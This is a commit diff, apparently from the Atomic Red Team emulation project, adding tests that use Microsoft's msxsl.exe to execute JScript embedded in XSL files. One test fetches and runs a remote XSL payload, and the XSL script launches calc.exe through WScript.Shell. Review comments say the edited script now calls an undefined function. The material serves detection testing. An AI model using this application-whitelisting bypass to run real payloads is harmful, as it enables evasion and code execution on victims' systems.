Added remote test, simplified script file

Tony M Lambert
2018-09-14 20:35:48 -05:00
parent ddd0e81e54
commit 03adb61ee4
5 changed files with 74 additions and 8 deletions
+42
@@ -58,6 +58,10 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)
- [Atomic Test #2 - MSXSL Bypass using local files](#atomic-test-2---msxsl-bypass-using-local-files)
- [Atomic Test #3 - MSXSL Bypass using remote files](#atomic-test-3---msxsl-bypass-using-remote-files)
<br/>
@@ -77,3 +81,41 @@ Executes the code in a project file using. C# Example
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
```
<br/>
<br/>
## Atomic Test #2 - MSXSL Bypass using local files
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl|
#### Run it with `command_prompt`!
```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
<br/>
<br/>
## Atomic Test #3 - MSXSL Bypass using remote files
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl|
#### Run it with `command_prompt`!
```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
<br/>
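Review bot: Both new "Run it with `command_prompt`" blocks call `C:\Windows\Temp\msxsl.exe`, but the descriptions only say that MSXSL must be downloaded from Microsoft and never say it has to be placed in `C:\Windows\Temp`. Either state the expected location in the description or expose the binary path as an input argument with that default, the way `xmlfile` and `xslfile` are exposed. Also, `#{xmlfile}` and `#{xslfile}` are passed unquoted, so a local path containing spaces would be split into separate arguments.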
+23 -4
@@ -17,21 +17,40 @@ atomic_tests:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
- name: MSXSL Bypass
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft.
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Location of the test XML file. May be a URL.
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
xslfile:
description: Location of the test XSL script file. May be a URL.
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
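Review bot: The `default` values for `xmlfile` and `xslfile` in the "MSXSL Bypass using remote files" entry point at `.../atomic-red-team/master/...`, a branch ref, so the script a host executes is whatever sits at that path when the test runs and can change without this YAML changing. Consider pinning the defaults to a commit, or say in the `description` that the test needs outbound access to raw.githubusercontent.com and runs the current contents of master, so operators know what to expect in proxy and EDR telemetry.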
+1 -4
@@ -5,10 +5,7 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
return nodelist.nextNode().xml;
}
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
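Review bot: The template after the script block still evaluates `user:xml(.)`, but the `function xml(nodelist)` definition is among the lines this hunk changes (the file stat is +1 -4), so once the body is reduced to the single top-level `var r = ...` statement the call has no function behind it. Either keep the function wrapper or drop the `xsl:value-of` call so the transform does not depend on an undefined extension function. Separately, the path inside the JScript string uses single backslashes (`C:\Windows\System32\calc.exe`); inside a JScript string literal those are read as escape sequences, so they should be doubled.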
+4
@@ -262,6 +262,8 @@
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -495,6 +497,8 @@
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1047 Windows Management Instrumentation](./T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
+4
@@ -91,6 +91,8 @@
- [T1099 Timestomp](./T1099/T1099.md)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -408,6 +410,8 @@
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- Atomic Test #2: MSXSL Bypass using local files [windows]
- Atomic Test #3: MSXSL Bypass using remote files [windows]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1047 Windows Management Instrumentation](./T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]